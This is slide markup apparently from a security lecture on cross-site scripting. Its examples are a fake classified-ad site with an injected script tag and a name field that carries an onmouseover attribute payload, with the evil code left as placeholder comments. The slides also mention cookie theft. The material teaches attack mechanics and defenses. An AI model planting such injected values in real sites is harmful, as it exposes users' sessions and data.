            <a:ext cx="1143000" cy="18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1" name="Shape 9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3950" y="3575050"/>
            <a:ext cx="1143000" cy="181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2" name="Shape 972"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="973" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1468900" y="4664575"/>
            <a:ext cx="6054300" cy="94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74" name="Shape 974"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3136275" y="4505850"/>
            <a:ext cx="4356900" cy="109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75" name="Shape 975"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="973" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2272900" y="5607475"/>
            <a:ext cx="5250300" cy="43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76" name="Shape 976"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4128675" y="5617400"/>
            <a:ext cx="3364500" cy="62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77" name="Shape 977"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161739">
            <a:off x="6653172" y="3923076"/>
            <a:ext cx="3156100" cy="446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blaigslist.com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20075"/>
            <a:ext cx="2679700" cy="17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Big Picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924507" y="3756338"/>
            <a:ext cx="1175400" cy="11433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230" name="Shape 230"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4811469" y="3988142"/>
            <a:ext cx="1701900" cy="7284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FIREWALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Shape 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610621" y="4968357"/>
            <a:ext cx="1191000" cy="92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Authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Shape 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916630" y="4968357"/>
            <a:ext cx="1191000" cy="92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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Shape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836664" y="2787097"/>
            <a:ext cx="1263300" cy="92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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Shape 234"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125575" y="3434605"/>
            <a:ext cx="1343250" cy="999432"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator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 Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="235" name="Shape 235"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="234" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458075" y="3244621"/>
            <a:ext cx="3667500" cy="6897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6" name="Shape 236"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2199961" y="3539498"/>
            <a:ext cx="3957600" cy="5667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7" name="Shape 237"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="234" idx="3"/>
            <a:endCxn id="229" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7468825" y="3934321"/>
            <a:ext cx="455700" cy="39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238" name="Shape 238"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="233" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7412764" y="3250747"/>
            <a:ext cx="423900" cy="39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239" name="Shape 239"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7324863" y="4433998"/>
            <a:ext cx="663600" cy="55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240" name="Shape 240"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="234" idx="2"/>
            <a:endCxn id="231" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797200" y="4434037"/>
            <a:ext cx="408900" cy="53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241" name="Shape 241"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7021870" y="2671820"/>
            <a:ext cx="622800" cy="61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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172864" y="2671820"/>
            <a:ext cx="744300" cy="61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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665543" y="5097051"/>
            <a:ext cx="887700" cy="61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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Shape 244"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847436" y="5763990"/>
            <a:ext cx="887700" cy="61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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Shape 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817528" y="5824621"/>
            <a:ext cx="887700" cy="61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AND MORE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491625" y="1578075"/>
            <a:ext cx="3859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Some of you wondered how attackers or malware actually apply some of the techniques we've covered (i.e. buffer overflows, shellcode, etc...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Shape 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2192950" y="3064800"/>
            <a:ext cx="1701900" cy="7284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FIREWALL   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Shape 248"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822300" y="2986550"/>
            <a:ext cx="1376460" cy="1646892"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet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454750" y="4277025"/>
            <a:ext cx="20895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4984967" y="1590359"/>
            <a:ext cx="39945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 servers are constantly, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>attacked by hackers.  Their goals *usually* vary from sneaking malware onto the site to target it's users, to stealing user info from the databases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528475" y="4633450"/>
            <a:ext cx="3711600" cy="18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 users are rarely ever directly attacked (by hackers or malware).  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 u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>prevents most direct attacks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Instead users face many </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>indirect attacks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Users are commonly attacked by malware hosted on malicious / hacked websites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Shape 98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XSS Example 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="983" name="Shape 98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To illustrate how this can go wrong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An attacker can insert &lt;html&gt; tags into his text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gets rendered with the static conent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="984" name="Shape 9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4654700"/>
            <a:ext cx="1968500" cy="19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5" name="Shape 9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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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Shape 986"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5250213" y="5091418"/>
            <a:ext cx="1310040" cy="1290168"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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000"/>
              <a:t>Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="987" name="Shape 987"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2173525" y="5607475"/>
            <a:ext cx="528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988" name="Shape 9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1626" y="4487953"/>
            <a:ext cx="2162695" cy="2052697"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="989" name="Shape 989"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161739">
            <a:off x="6653172" y="3923076"/>
            <a:ext cx="3156100" cy="446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blaigslist.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="990" name="Shape 990"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2907950" y="4724175"/>
            <a:ext cx="1607700" cy="14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Secure Web Developer Needed!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; /*evil javascript */ &lt;/script&gt;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Shape 99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XSS Example 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="996" name="Shape 99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gets rendered as such:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="997" name="Shape 9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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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8" name="Shape 998"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3721775" y="3550800"/>
            <a:ext cx="3195900" cy="301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&lt;html&gt;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&lt;body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;h1&gt;New Classified posting&lt;/h1&gt;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&lt;h2&gt;Description&lt;/h2&gt;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&lt;hr/&gt;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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; /*evil javascript */ &lt;/script&gt;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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="999" name="Shape 999"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540400" y="3562975"/>
            <a:ext cx="1826100" cy="117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000" name="Shape 1000"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6639650" y="6520550"/>
            <a:ext cx="1707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001" name="Shape 1001"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630050" y="4485975"/>
            <a:ext cx="1042200" cy="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02" name="Shape 1002"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1399375" y="4312300"/>
            <a:ext cx="17766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Static content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003" name="Shape 1003"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886975" y="5074750"/>
            <a:ext cx="19155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Secure Web Developer  Needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1004" name="Shape 1004"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1003" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2411575" y="5288050"/>
            <a:ext cx="1475400" cy="59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05" name="Shape 1005"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956625" y="5299475"/>
            <a:ext cx="27096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Dynamic (user supplied) content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006" name="Shape 1006"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161739">
            <a:off x="6653172" y="3923076"/>
            <a:ext cx="3156100" cy="446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blaigslist.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1007" name="Shape 10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302550"/>
            <a:ext cx="1968500" cy="19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Shape 10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XSS Example 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1013" name="Shape 10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Anyone who views the ad posting will be hit by the XSS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Usually will be no visual indication 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victims will be 100% clueless they've just been hacked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1014" name="Shape 10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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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5" name="Shape 1015"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356977" y="4198186"/>
            <a:ext cx="1984932" cy="2213136"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1016" name="Shape 1016"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7523200" y="5339575"/>
            <a:ext cx="952800" cy="535800"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1017" name="Shape 10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0075" y="4952575"/>
            <a:ext cx="1143000" cy="18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8" name="Shape 10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9050" y="4952575"/>
            <a:ext cx="1143000" cy="18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9" name="Shape 10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975" y="3575050"/>
            <a:ext cx="1143000" cy="18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0" name="Shape 10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3950" y="3575050"/>
            <a:ext cx="1143000" cy="181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1" name="Shape 1021"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1016" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1468900" y="4664575"/>
            <a:ext cx="6054300" cy="9429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22" name="Shape 1022"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3136275" y="4505850"/>
            <a:ext cx="4356900" cy="10917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23" name="Shape 1023"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1016" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2272900" y="5607475"/>
            <a:ext cx="5250300" cy="4368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24" name="Shape 1024"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4128675" y="5617400"/>
            <a:ext cx="3364500" cy="6252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25" name="Shape 1025"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-2161739">
            <a:off x="6195972" y="4304076"/>
            <a:ext cx="3156100" cy="446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www.fantasy-quidditch-league.com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hape 10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what can attackers do with XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Shape 103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Common attack is to steal session ID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In javascript: document.cookie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Rewrite any part of webpage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Defacing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Clickjacking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32" name="Shape 10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556" y="2833168"/>
            <a:ext cx="845494" cy="1191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Shape 10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3725" y="3628530"/>
            <a:ext cx="3598100" cy="2940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Shape 10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Defending against XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039" name="Shape 103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Can we just block the &lt;script&gt; tag and just be safe?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NO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can still do XSS without &lt;script&gt;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Shape 10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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045" name="Shape 104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Imagine some social media site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Users sign up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enter username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password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>etc..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1046" name="Shape 10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875" y="3343179"/>
            <a:ext cx="4194925" cy="2735596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Shape 1047"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476400" y="4019525"/>
            <a:ext cx="3781200" cy="23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First Name: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input type="text" id="fname"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value=""</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1048" name="Shape 1048"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2828600" y="3612600"/>
            <a:ext cx="2183400" cy="67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Shape 10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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Shape 105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User types in "BOB" and this gets put in the text boxes value attribute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On that user's page, his name is stored in a text box</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1055" name="Shape 10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875" y="3343179"/>
            <a:ext cx="4194925" cy="2735596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056" name="Shape 1056"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476400" y="4019525"/>
            <a:ext cx="3781200" cy="23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First Name: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input type="text" id="fname"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value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BOB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1057" name="Shape 1057"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2828600" y="3612600"/>
            <a:ext cx="2183400" cy="67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58" name="Shape 1058"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885375" y="3473650"/>
            <a:ext cx="16674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BOB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Shape 10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XSS Example 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1064" name="Shape 106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Consider this input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1065" name="Shape 10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875" y="3343179"/>
            <a:ext cx="4194925" cy="2735596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Shape 1066"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476400" y="4019525"/>
            <a:ext cx="3781200" cy="23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First Name: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input type="text" id="fname"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value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1067" name="Shape 1067"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2828600" y="3612600"/>
            <a:ext cx="2183400" cy="67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68" name="Shape 1068"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885375" y="3473650"/>
            <a:ext cx="29178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BOB" onmouseover="/*evil*/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1069" name="Shape 10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302550"/>
            <a:ext cx="1789856" cy="1789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Shape 10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XSS Example 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Shape 107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Consider this input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1076" name="Shape 10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875" y="3343179"/>
            <a:ext cx="4194925" cy="2735596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Shape 1077"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476400" y="4019525"/>
            <a:ext cx="3781200" cy="23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First Name: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;input type="text" id="fname"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value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BOB" onmouseover="/*evil*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1078" name="Shape 1078"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2828600" y="3612600"/>
            <a:ext cx="2183400" cy="67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79" name="Shape 1079"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885375" y="3473650"/>
            <a:ext cx="29178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BOB" onmouseover="/*evil*/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1080" name="Shape 10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302550"/>
            <a:ext cx="1789856" cy="1789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Shape 108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XSS Example 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086" name="Shape 108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Anyone who mouseover's the textbox containing the attackers name will be hit by XSS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victims will be 100% clueless they've just been hacked</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1087" name="Shape 10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5500" y="4737250"/>
            <a:ext cx="1511300" cy="180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Shape 1088"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4356977" y="4198186"/>
            <a:ext cx="1984932" cy="2213136"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Shape 1089"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7523200" y="5339575"/>
            <a:ext cx="952800" cy="535800"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1090" name="Shape 10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0075" y="4952575"/>
            <a:ext cx="1143000" cy="18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1" name="Shape 10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9050" y="4952575"/>
